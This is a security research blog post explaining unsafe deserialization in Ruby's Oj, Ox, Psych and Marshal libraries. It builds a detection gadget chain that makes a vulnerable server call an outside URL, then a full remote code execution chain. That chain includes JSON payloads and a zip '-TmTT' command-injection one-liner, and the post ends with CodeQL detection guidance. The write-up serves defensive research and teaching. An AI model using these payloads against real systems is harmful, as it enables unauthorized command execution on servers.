Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects
Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible?
In this blog post, we’ll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects. All samples in this blog post are made using the Oj JSON serialization library for Ruby, but that does not mean they are limited to this library. At the end of this blog post, we will link to a repository that contains working sample exploits that work for Oj (JSON), Ox (XML), Psych (YAML), and Marshal (custom binary format), and show you how CodeQL can detect such vulnerabilities. Understanding how unsafe deserialization works can help you avoid this class of bugs in its entirety instead of focusing on avoiding certain methods.
Contents
- Step-by-step: Putting together a detection gadget chain for Oj
- Extending the detection gadget to a full-fledged universal remote code execution chain
- Detecting unsafe deserialization when the source code is available
Step-by-step: Putting together a detection gadget chain for Oj
Many people have an idea of how the exploitation of deserialization vulnerabilities could work. But how does it really work? (It’s part magic and part sweat and tears.) In this section, we show how to build an unsafe deserialization detection gadget for Oj, a Ruby-based JSON deserialization library, that calls an external URL. This detection gadget is based on William Bowling’s (aka vakzz) universal deserialisation gadget for Marshal and Ruby 3.0.3 adapted to Oj and Ruby 3.3.
1. It starts with a class
Most of the time, unsafe deserialization vulnerabilities arise from a deserialization library’s support for polymorphism, which implies the ability to instantiate arbitrary classes or class-like structures specified in the serialized data. The attacker then chains those classes together to execute code on the system under exploitation. All used classes must typically be accessible by the exploited project. In this context, classes that are useful for a certain purpose, such as executing commands or code, are called gadgets. Combining those classes into a bigger exploit (for example, by nesting them) yields a so-called gadget chain. The ability to serialize and deserialize arbitrary constructs was long seen as a powerful feature, and it was originally not intended for code execution. In 2015, the public perception of this feature changed with the release of a blog post about widespread Java deserialization vulnerabilities by FoxGlove Security. In 2017, unsafe deserialization attacks against Java and .NET based JSON libraries were presented at Black Hat under the title “Friday the 13th: JSON Attacks”.
When the (non-default) Ruby library named Oj is used for deserializing JSON, a project is vulnerable simply by having a construct such as:
data = Oj.load(untrusted_json)
The Oj library by default supports the instantiation of classes specified in JSON. It’s possible to disable this behavior by specifying an additional parameter or using `Oj.safe_load` instead.
As mentioned in the introduction, unsafe deserialization vulnerabilities are not limited to JSON; they can occur wherever arbitrary classes or class-like structures are deserialized from user-controlled data.
To instantiate a class named `MyClass` with a field called `member` that holds the content `value`, the following JSON has to be passed to a vulnerable Oj sink:
{
  "^o": "MyClass",
  "member": "value"
}
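For contrast, a parser without polymorphic type handling treats the same document as plain data. A minimal sketch using `JSON.parse` from Ruby’s bundled json library (not Oj), which keeps `^o` as an ordinary string key and instantiates nothing:

```ruby
require 'json'

# The payload from above; "MyClass" does not need to exist for this demo.
payload = '{"^o": "MyClass", "member": "value"}'

# JSON.parse only builds Hashes, Arrays, Strings, numbers, booleans and nil.
data = JSON.parse(payload)

puts data.class   # Hash
puts data["^o"]   # MyClass (just a string, no object was created)
```

The difference between the two behaviors is exactly the feature that gadget chains depend on.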
2. Now come the maps (hashes), lists, getters, setters, constructors, and more
While the instantiation of classes is the most common denominator for unsafe deserialization vulnerabilities, the next building blocks differ from language to language. While in Java and similar languages unsafe deserialization vulnerabilities sometimes make use of constructors, setters, and getters to initially trigger code execution, we can’t rely on them for Ruby deserialization vulnerabilities. Vakzz’s blog post is about the exploitation of Ruby’s binary Marshal serialization, which relies on a so-called magic method (a method invoked in the reconstruction of the serialized objects) named `_load` (similar to Java’s `readObject`) to trigger code execution. However, Oj does not invoke this magic method, so in order to trigger the execution of our gadget chain we can’t rely on this method and have to find something else.
To answer the question up front: what can we even use to trigger code execution in Oj?
The `hash`(code) method!
Oj is not the only deserialization library where we rely on the `hash` method as a kick-off for our gadget chain. The `hash` method is typically called on the key object when the deserialization library adds a key-value pair to a hashmap (simply called a hash itself in Ruby).
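This behavior can be observed in plain Ruby without any deserialization library. A minimal sketch, using a hypothetical `HashProbe` class that counts how often its `hash` method is invoked:

```ruby
# Hypothetical probe class: it records whenever its hash method is invoked.
class HashProbe
  attr_reader :calls

  def initialize
    @calls = 0
  end

  def hash
    @calls += 1
    super # fall back to the default Integer hash value
  end
end

probe = HashProbe.new
table = {}
table[probe] = "any" # inserting the key makes Ruby ask for probe.hash

puts probe.calls.positive?
```

Any code path that stores an attacker-supplied object as a hash key therefore runs that object’s `hash` method as a side effect.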
This table shows the kick-off methods for the popular serialization libraries in Ruby:

| Library | Input data | Kick-off method inside class |
| --- | --- | --- |
| Marshal (Ruby) | Binary | `_load` |
| Oj | JSON | `hash` (class needs to be put into hash(map) as key) |
| Ox | XML | `hash` (class needs to be put into hash(map) as key) |
| Psych (Ruby) | YAML | `hash` (class needs to be put into hash(map) as key), `init_with` |
| JSON (Ruby) | JSON | `json_create` ([see notes regarding json_create at end](#table-vulnerable-sinks)) |
Let’s create a small proof of concept to demonstrate kicking off our gadget chain with the `hash` method.
We assume that we have a class, such as the one following, available in the targeted Ruby project (hint: there won’t be such a gadget in real-world projects):
class SimpleClass
  def initialize(cmd)
    @cmd = cmd
  end

  def hash
    system(@cmd)
  end
end
A call to “hash” would execute the command in the “@cmd” member variable using “system.” Note that in the Oj deserialization process the constructor isn’t executed. Here, we use it to create a quick sample payload ourselves and dump the resulting JSON:
require 'oj'
simple = SimpleClass.new("open -a calculator") # command for macOS
json_payload = Oj.dump(simple)
puts json_payload
Note: while it might make sense to directly serialize single gadgets, serializing or even just debugging a whole gadget chain is typically dangerous as it might trigger the execution of the chain during the serialization process (which won’t give you the expected result, but you’ll “exploit” your own system).
The payload JSON looks like this:
{
  "^o": "SimpleClass",
  "cmd": "open -a calculator"
}
If we now load this JSON with `Oj.load`, nothing happens. Why? Because nobody actually calls the hash method.
data = Oj.load(json_payload)
So, no calculator for now.
But now the question is: how do we trigger the `hash`(code) method ourselves? We have to put the class we want to instantiate inside of a hash(map) as the key. If we now package our previous payload inside a hash(map) as a key, it looks like this in Oj’s serialization format:
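A sketch of that wrapped payload, assuming Oj’s object-mode convention in which a JSON key starting with `^#` carries a two-element `[key, value]` array describing one hash entry (the suffix `1` is arbitrary here). The JSON is assembled with Ruby’s bundled json library purely for illustration; nothing is deserialized:

```ruby
require 'json'

# The single-gadget payload from the previous step.
inner = { "^o" => "SimpleClass", "cmd" => "open -a calculator" }

# Assumption: in Oj's object mode a "^#..." key marks a hash entry
# that is given as [key, value].
wrapped = { "^#1" => [inner, "any"] }

json_payload = JSON.pretty_generate(wrapped)
puts json_payload
```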
The value of the hash(map) entry is left to “any.” Now, the command execution is triggered just by loading the JSON:
Oj.load(json_payload)
Et voilà: we started a calculator.
3. Constructing a payload with gadgets
Now, in reality our targeted project won’t have a “SimpleClass” available that simply executes commands when its hash method is called. No software engineer would develop something like that (I hope 😅).
Sidenote: Java’s URL class performs DNS lookups when hashCode() or equals() are called. 🙈
We are required to use classes that are part of the Ruby project we’re analyzing or its dependencies. Preferably, we’d even want to use classes that are part of Ruby itself, and as such, are always available. How to find such classes is described in Elttam’s blog post from 2018 and in vakzz’s blog post from 2022.
We are now focusing on porting vakzz’s universal gadget chain for Marshal from 2022 to Oj and Ruby 3.3. The hard work of creating a working gadget chain has been mostly performed by vakzz; we reuse most of the parts here to assemble a gadget chain that works in recent versions of Ruby and in other deserialization libraries. The goal is to have a gadget chain that is able to call an arbitrary URL. Namely, we’re interested in getting a callback to our server to prove our ability to execute code (hopefully) without causing any further damage.
Disclaimer: this doesn’t mean that this detection gadget chain is harmless. Only use this against your own systems or systems where you have a written permission to do so.
Now, vakzz’s gadget chain relied on the kick-off with a call to `to_s` (toString). `to_s` was triggered inside of the `_load` method of specification.rb. `_load` is a method that is triggered when an object is deserialized with Marshal. The Oj deserializer does not make use of `_load` or a similar method.
The rough instantiation process of a class as performed by Oj is as follows:
- Instantiate an empty shell of the class (without calling a constructor).
- Fill class fields directly (without calling setters).
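
These two steps can be approximated in plain Ruby. This is only a sketch of the idea, not Oj’s actual implementation, and the `Traced` class is hypothetical:

```ruby
# Hypothetical class whose constructor leaves a trace when it runs.
class Traced
  attr_reader :cmd, :constructed

  def initialize(cmd)
    @constructed = true
    @cmd = cmd
  end
end

# Step 1: create the bare object; allocate never calls initialize.
obj = Traced.allocate

# Step 2: write the field directly, bypassing any setter.
obj.instance_variable_set(:@cmd, "value")

puts obj.cmd                 # value
puts obj.constructed.inspect # nil, because the constructor never ran
```

Validation logic placed in constructors or setters is therefore never consulted during this kind of object reconstruction.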
So, this normal deserialization process doesn’t trigger code execution by itself. But from the simple example above we know we can make calls to `hash`. For now, this has to be enough.
We now have learned that:
- We can trigger the `hash` method on an arbitrary class (kick-off gadget).
- We must call the `to_s` method on an internal member.

=> We have to find a bridge between the two.
For this process, you can use a tool such as CodeQL and write a custom query that you run on the ruby/ruby codebase. After some querying, I’ve found a bridge in a class I’ve encountered before: the Requirement class. Its hash method indeed has a call to `to_s`:
def hash # :nodoc:
  requirements.map {|r| r.first == "~>" ? [r[0], r[1].to_s] : r }.sort.hash
end
At first, this might look a bit complicated for people who are not familiar with Ruby. So, we will break down the requirements for calling `to_s` on the inner gadget here:
- We need an array of `requirements` that can be transformed by using the map function.
- Inside this array we need another array, whose first element (`r[0]`) is equal to “~>”.
- If we then place our next gadget inside of the second element (`r[1]`) the to_s method will be called on it!
Expressed in JSON this could look like this:
[ ["~>", <INNER_GADGETS> ] ]
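The bridge can be tried out in isolation. A minimal sketch that evaluates the same expression as the `hash` method quoted above on a hand-built array, with a hypothetical `ToSProbe` class standing in for the inner gadget:

```ruby
# Hypothetical stand-in for the inner gadget: it records calls to to_s.
class ToSProbe
  attr_reader :called

  def to_s
    @called = true
    "1.0"
  end
end

probe = ToSProbe.new
requirements = [["~>", probe]]

# Same expression as in the body of the hash method quoted above.
requirements.map { |r| r.first == "~>" ? [r[0], r[1].to_s] : r }.sort.hash

puts probe.called
```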
We’re now able to bridge a call from `hash` to `to_s` and trigger the rest of the gadget chain.
The next link of vakzz’s gadget chain is of type `Gem::RequestSet::Lockfile`. When `to_s` is called on an object of class Lockfile it calls `spec_groups` on the same class:
def to_s
  out = []
  groups = spec_groups
  [..]
The method `spec_groups` enumerates the return value of the `requests` method, which returns the `sorted_requests` field of a `RequestSet`. (Note that in Ruby versions before 3.3 this field was called `sorted`.)
What might not be obvious to people not familiar with Ruby is that the statement `requests` actually calls the `requests` method.
def spec_groups
  requests.group_by {|request| request.spec.class }
end
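The implicit method calls are easier to see with stand-in classes. In this sketch `FakeRequest` and `FakeLockfile` are hypothetical; the real classes live in RubyGems:

```ruby
# Hypothetical stand-in for a request object; it counts calls to spec.
class FakeRequest
  attr_reader :spec_calls

  def initialize
    @spec_calls = 0
  end

  def spec
    @spec_calls += 1
    :some_spec
  end
end

# Hypothetical stand-in for the lockfile class.
class FakeLockfile
  def initialize(requests)
    @requests = requests
  end

  # A bare identifier without arguments resolves to this method call.
  def requests
    @requests
  end

  def spec_groups
    requests.group_by { |request| request.spec.class }
  end
end

request = FakeRequest.new
groups = FakeLockfile.new([request]).spec_groups

puts groups.keys.inspect
puts request.spec_calls
```

Enumerating the requests is enough to invoke `spec` on every element, which is what hands control to the next object in the chain.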
In the same manner, the method `spec` is called on the inner class `Gem::Resolver::IndexSpecification` while enumerating over the requests. The call to `spec` internally leads to a call to `fetch_spec` on the type `Gem::Source`, which in turn leads to a call of `fetcher.fetch_path` with `source_uri`:
def fetch_spec(name_tuple)
  fetcher = Gem::RemoteFetcher.fetcher
  spec_file_name = name_tuple.spec_name
  source_uri = enforce_trailing_slash(uri) + "#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}"
  [..]
  source_uri.path << ".rz"
  spec = fetcher.fetch_path source_uri
  [..]
end
`source_uri` itself is built from the internal `uri` attribute. This `uri` is of type `URI::HTTP`. Now, it seems straightforward, and one might be inclined to use a normal URI object with an http or https scheme. That would somewhat work, but the resulting URL path would not be completely choosable, as the URI is parsed in those cases, making the shenanigans that come next impossible. So, vakzz found a way of using S3 as the scheme for a URI object. In JSON this would look like this:
{
  "^o": "URI::HTTP",
  "scheme": "s3",
  "host": "example.org/anyurl?",
  "port": "anyport",
  "path": "/",
  "user": "anyuser",
  "password": "anypw"
}
In this sample the scheme of the URL is set to “s3” while the “host” (!) is set to “example.org/anyurl?”.
The `uri` attribute has the following content:
One might notice that at least the host and the port look off in this sample.
The complete `source_uri`, before it is provided to `fetcher.fetch_path`, looks like this:
Now, since the scheme of this URI object is `s3`, the `RemoteFetcher` calls the `fetch_s3` method, which signs the URL using the given username and password and creates an HTTPS URI out of it. It then calls `fetch_https`.
Here, we notice that the host and port of the URL look normal again. Luckily for us, every other addition was put after the question mark marking the query. So, our targeted URL will be called as we want.
#<URI::HTTPS https://example.org/anyurl?.s3.us-east-1.amazonaws.com/quick/Marshal.4.8/-.gemspec.rz?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=anyuser%2F20240412%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240412T120426Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=fd04386806e13500de55a3aec222c2de9094cba7112eb76b4d9912b48145977a>
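Parsing the signed URL with Ruby’s bundled uri library illustrates why the request goes where we want. A minimal sketch, using a shortened copy of that URL (only the first signing parameter is kept):

```ruby
require 'uri'

# Shortened form of the signed URL above.
signed = "https://example.org/anyurl?.s3.us-east-1.amazonaws.com" \
         "/quick/Marshal.4.8/-.gemspec.rz?X-Amz-Algorithm=AWS4-HMAC-SHA256"

uri = URI.parse(signed)

puts uri.host  # example.org
puts uri.path  # /anyurl
puts uri.query # everything after the first question mark
```

The S3 host suffix, the gemspec path, and the signature parameters all end up inside the query string, where they no longer influence which host and path are requested.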
After `fetch_https` has been called with our desired URL, the code of the `Source` class tries to inflate and store the downloaded content. In this detection scenario, our gadget should only call an external URL of our choice (for example, a service like Canarytokens or Burp Collaborator) so that we get a notification when the URL has been called. It is therefore better if the execution of the exploit ends here, before the received data is extracted and stored.
When we put our detection gadget chain into a vulnerable `Oj.load` sink, our defined URL is requested using a GET request. This request then looks like this (using Burp’s Collaborator):
=> After our given URL was triggered, we know that we’ve detected a vulnerable application. This technique could also help detect an out-of-band execution of our JSON-based exploit.
(Note that this technique will not work if the targeted system disallows outbound connections or only allows connections to URLs that are part of an allow list.)
The next diagram shows how the gadget chain is triggered with a call to `hash` on the `Gem::Requirement` class and ends with a call to `fetch_path` on the `Gem::Source` class:
Extending the detection gadget to a full-fledged universal remote code execution chain
Now that we’ve built a gadget chain for detection we also want to know if a gadget chain leading to remote code execution (RCE) is doable.
The previously mentioned Marshal-based gadget chain from vakzz from April 2022 allowed remote code execution against Ruby 3.0.2 based projects. But this exact approach stopped working somewhere around Ruby 3.2. As mentioned before at least one additional issue came up with Ruby 3.3.
So, we had to work around both to achieve remote code execution with Ruby 3.3.
In short: vakzz’s gadget chain uses the `Gem::Source::Git` class to execute commands, namely via the `rev_parse` method that is triggered via the `add_GIT` method inside of the `Gem::RequestSet::Lockfile` class we’ve seen before:
def rev_parse # :nodoc:
  hash = nil
  Dir.chdir repo_cache_dir do
    hash = Gem::Util.popen(@git, "rev-parse", @reference).strip
  end
  [..]
end
Here, we see that a certain `Util.popen` method is called, which itself calls `IO.popen`: a classical command injection sink! The `popen` method is called with a command from the member variable `@git`, followed by the string literal `rev-parse` as the first argument and a second member variable named `@reference`, which is also under the attacker’s control. Well, since we know we can likely control those member variables, this looks pretty interesting, right?
Now, there’s at least one problem: the method `rev_parse` wants to change the working directory to `repo_cache_dir`. And `repo_cache_dir` is defined as follows:
def repo_cache_dir # :nodoc:
  File.join @root_dir, "cache", "bundler", "git", "#{@name}-#{uri_hash}"
end
So, this method joins a directory starting with the member variable `@root_dir`, then the static folders “cache,” “bundler,” and “git,” and then a folder that is a combination of the member variable `@name` and `uri_hash`. `uri_hash` is a longer method, whose function can for our purposes be abbreviated as “the SHA-1 hash of the member variable `@repository`.”
All combined, `repo_cache_dir` will return a path such as:
@root_dir/cache/bundler/git/@name-SHA1(@repository)
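The same path can be computed by hand. A minimal sketch with a hypothetical helper that mirrors the layout described above and, as in the text, treats `uri_hash` as the plain SHA-1 of the repository string; the argument values are placeholders:

```ruby
require 'digest'

# Hypothetical helper; uri_hash is simplified to SHA-1(repository).
def repo_cache_dir(root_dir, name, repository)
  uri_hash = Digest::SHA1.hexdigest(repository)
  File.join(root_dir, "cache", "bundler", "git", "#{name}-#{uri_hash}")
end

path = repo_cache_dir("/tmp", "anyname", "anyrepo")
puts path
```

Because all three inputs are member variables under our control, the resulting directory name is fully predictable.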
So, either we have to know of such a folder on the target system to which we can point to using the three member variables in our control OR we have to create the folder ourselves. Now, knowing of such a folder on the target system might be a bit tricky at least due to the @name + SHA-1 hash combination involved. But how would we create such a folder ourselves?
This need for an existing folder is actually one of the reasons vakzz’s gadget chain includes the first part, which we use for detection, at all. The previously mentioned `fetch_spec` method of the class `Gem::Source` executes `mkdir_p` on the given `cache_dir` in case the fetching and inflating of the given `source_uri` succeeded.
def fetch_spec(name_tuple)
  [..]
  cache_dir = cache_dir source_uri
  local_spec = File.join cache_dir, spec_file_name
  [..]
  spec = fetcher.fetch_path source_uri
  spec = Gem::Util.inflate spec
  if update_cache?
    require "fileutils"
    FileUtils.mkdir_p cache_dir
    File.open local_spec, "wb" do |io|
      io.write spec
    end
  end
  [..]
end
The local variable `cache_dir` is computed by the `cache_dir` method from `source_uri`, and we know that, thanks to the use of the S3 scheme, some shenanigans with URLs are possible that would otherwise not work. So we can influence which directory gets created. Now, since the file that’s downloaded from `source_uri` needs to be inflatable, we would change the `URI::HTTP` of our previous detection gadget to something like:
{
  "^o": "URI::HTTP",
  "scheme": "s3",
  "host": "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz?",
  "port": "/../../../../../../../../../../../../../tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/",
  "path": "/",
  "user": "anyuser",
  "password": "anypw"
}
In this sample we load an existing inflatable file directly from Rubygems.org and make sure that all the folders in the following path exist:
/tmp/cache/bundler/git/anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/
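Why the `port` value steers the created directory can be sketched with plain path arithmetic. The sketch assumes that the cache directory is formed by joining a base directory with the string `host%port` (an assumption about RubyGems internals that is not shown in this post), and it uses a hypothetical base directory:

```ruby
# Hypothetical base directory; the real value depends on the target system.
base = "/home/user/.gem/specs"

host = "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz?"
port = "/../../../../../../../../../../../../../tmp/cache/bundler/git/" \
       "anyname-a3f72d677b9bbccfbe241d88e98ec483c72ffc95/"

# Assumption: host and port are combined as "host%port" below the base.
joined = File.join(base, "#{host}%#{port}")

# Resolving the ".." segments lexically shows where the path ends up.
resolved = File.expand_path(joined)
puts resolved
```

The lexical resolution is only an approximation of what happens on a real filesystem, but it shows that enough `..` segments walk back to the root before descending into `/tmp`.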
The string “a3f72d677b9bbccfbe241d88e98ec483c72ffc95” is the SHA-1 hash of “anyrepo,” which we can use later on for creating the Git object. We know now that we’re able to create a folder that `rev_parse` can switch to and execute the command line tool given in the `@git` member variable. The original exploit for Marshal used commands that were embedded in the deflated .rz file for the command execution.
The execution order of the old exploit chain was roughly:
- Download the .rz file containing deflated commands.
- Execute the command `tee rev-parse` with the input stream from the inflated .rz file (the file rev-parse now contains the commands).
- Execute the command `sh rev-parse`.
However, this full chain stopped working around Ruby 3.2.2 since the `strip` method inside `rev_parse` now raised an error:
`strip': invalid byte sequence in UTF-8 (Encoding::CompatibilityError)
The challenge
We now have a fun challenge on our hands because we need to find a new way to execute arbitrary commands.
We learned that we have the following skeleton for executing commands:
<arbitrary-bin> rev-parse <arbitrary-second-argument>
The constraints are as follows:
- The binary to execute and the second argument are freely choosable.
- The first argument is always `rev-parse`.
- What is returned from this popen call should be readable as UTF-8 (on Linux) to allow additional executions.
- You can call `popen` as many times as you want with different binary and second argument combinations, as long as at most the execution of the last command combination fails.
- Additionally, it’s also possible to pass in a stream as a second argument.
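
The shape of this call can be explored safely with a harmless binary. A minimal sketch, assuming the underlying call uses the array form of `IO.popen`; the helper name `run_rev_parse` is hypothetical:

```ruby
# Hypothetical helper reproducing the shape of the call: the binary and the
# second argument are free, the first argument is fixed.
def run_rev_parse(binary, reference)
  # The array form of IO.popen starts the program directly, without a shell.
  IO.popen([binary, "rev-parse", reference], &:read).strip
end

# Harmless stand-in for an attacker-chosen binary.
output = run_rev_parse("echo", "second-argument")
puts output
```

Since no shell is involved in this form, shell metacharacters in the second argument are passed through literally, so the chosen binary has to be one that turns its own arguments into command execution.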
A solution
While there are multiple solutions to this challenge (try it out yourself!), I searched for a solution using GTFOBins. GTFOBins is, by its own description:
_“GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.”_
We’re basically looking for a util that can somehow execute commands with its second argument or parameter.
Looking for GTFOBins that are usable for command execution, I settled on the `zip` binary, as it’s available by default on many different Linux distributions. `zip` allows command execution via its `-TT` (`--unzip-command`) flag when the `-T` flag is set as well. (Note that zip might work differently under certain macOS versions.)
Now, there are two remaining problems:
- The first argument is always `rev-parse`, but calling `-T -TT` afterwards doesn’t work if there’s no (zip) file named `rev-parse`.
- We only control the second argument and cannot add more arguments, but we need both `-T` and `-TT`.
We solve the first problem simply by creating a zip file with the name `rev-parse` (the file we add to the zip doesn’t matter, but we assume that `/etc/passwd` exists on typical Unix systems and is world readable):
zip rev-parse /etc/passwd
The second problem is addressed by combining both flags into a single argument, separated by `m`:
zip rev-parse -TmTT="$(id>/tmp/anyexec)"
This will execute the `id` command and store its output into `/tmp/anyexec`.
Putting it all together
To create a gadget chain that is able to execute code, we put the following pieces in order:
- Download any .rz file that can be inflated and triggers the folder creation.
- Execute `zip` to create a zip file called rev-parse.
- Execute `zip` a second time to execute an arbitrary command.
The last zip execution looks like this in JSON format:
{
  "^o": "Gem::Resolver::SpecSpecification",
  "spec": {
    "^o": "Gem::Resolver::GitSpecification",
    "source": {
      "^o": "Gem::Source::Git",
      "git": "zip",
      "reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
      "root_dir": "/tmp",
      "repository": "anyrepo",
      "name": "anyname"
    },
    "spec": {
      "^o": "Gem::Resolver::Specification",
      "name": "name",
      "dependencies": []
    }
  }
}
=> Now, we are able to execute commands (for example, calculators) by feeding a vulnerable application with our JSON.
Here we see the result of our test command. The output of `id` has been written to the file `/tmp/anyexec`:
See the full gadget chain in the accompanying repository of this blog post. Using this gadget chain, we can execute arbitrary commands on vulnerable projects.
Detecting unsafe deserialization when the source code is available
The previously shown gadget chains allow you to detect instances of unsafe deserialization without having access to the source code of a project. However, if you have access to CodeQL and the source code of a project and want to detect instances of unsafe deserialization, you can utilize CodeQL’s deserialization of user-controlled data query. This query will detect code locations where untrusted data flows to unsafe deserialization sinks. This query is part of GitHub’s code scanning with CodeQL query set for Ruby and results would show up like this in the code scanning section:
If you just want an overview of vulnerable sinks without any flow analysis, open the query named UnsafeDeserializationQuery.qll in Visual Studio Code with an installed CodeQL extension and click on “Quick Evaluation: isSink.”
This will return a list of all insecure deserialization sinks inside of your project (a CodeQL database of your project is required). For more information about this methodology see Find all sinks for a specific vulnerability type in part three of the CodeQL zero to hero blog series.
An overview of the different unsafe deserialization sinks in Ruby
The gadget chain shown in this blog post was observed to work up to Ruby 3.3.3 (released in June 2024). A repository was created containing exploits for the following deserialization libraries:
- Oj (JSON)
- Ox (XML)
- Ruby YAML/Psych (when used unsafely)
- Ruby Marshal (custom binary format; the Marshal version of the gadget chain only works up to Ruby 3.2.4, released in April 2024)
Here, we list the vulnerable sinks for a manual code review—code scanning/CodeQL from GitHub is already aware of all of these sinks.
Table: Vulnerable sinks

| Library | Unsafe sinks | Input data | Remark |
| --- | --- | --- | --- |
| Oj | `Oj.load` (if no safe mode is used), `Oj.object_load` | JSON | Safe mode available |
| Ox | `Ox.parse_obj`, `Ox.load` (if the unsafe object mode is used) | XML | (Un)safe mode available |
| Psych (Ruby) | `YAML.load` (for older Ruby/Psych versions) *, `YAML.unsafe_load` | YAML | * Since Psych 4.0 no arbitrary Ruby classes are instantiated when `YAML.load` is used. Ruby 3.1 (released in December 2021) depends on Psych 4.0 by default. |
| Marshal (Ruby) | `Marshal.load` | Binary | Should be avoided as a serialization format. |
| JSON (Ruby) | `JSON.load` ** | JSON | ** Only a limited set of classes that have a `json_create` method defined can be used. Due to this constraint there seems to exist no gadget chain as part of Ruby or Rails that allows arbitrary code/command execution. |
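
During a manual review it helps to know how a safe counterpart behaves. A minimal sketch using only the Psych library bundled with Ruby: `YAML.safe_load` refuses a document that asks for an arbitrary Ruby object instead of instantiating it (the YAML document is a made-up example):

```ruby
require 'yaml'

# A YAML document that asks the parser to build an arbitrary Ruby object.
doc = "--- !ruby/object:Gem::Requirement\nrequirements: []\n"

result =
  begin
    YAML.safe_load(doc)
    :loaded
  rescue Psych::DisallowedClass
    :rejected
  end

puts result
```

Code that needs richer types can pass an explicit allow list to `YAML.safe_load` via its `permitted_classes` keyword rather than switching to `YAML.unsafe_load`.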
Conclusion
In this blog post, we showed how an unsafe deserialization vulnerability can be detected and exploited in different ways. If you have access to the source code, the easiest way to detect unsafe deserialization vulnerabilities is to use GitHub code scanning with CodeQL on your repositories. If you want to deep dive into your code, you can use the CodeQL extension for Visual Studio Code for that.
Should you not have access to the source code of a project, you can make use of the detection gadgets we built up step by step in this blog post to detect unsafe deserialization vulnerabilities remotely. (The detection gadget calls a URL you’ve specified.) The post also explains how a universal remote code execution (RCE) gadget chain works, which you likely only want to use in lab settings. All gadget chains for the Marshal, YAML, Oj, and Ox deserialization libraries can be found in the accompanying repository.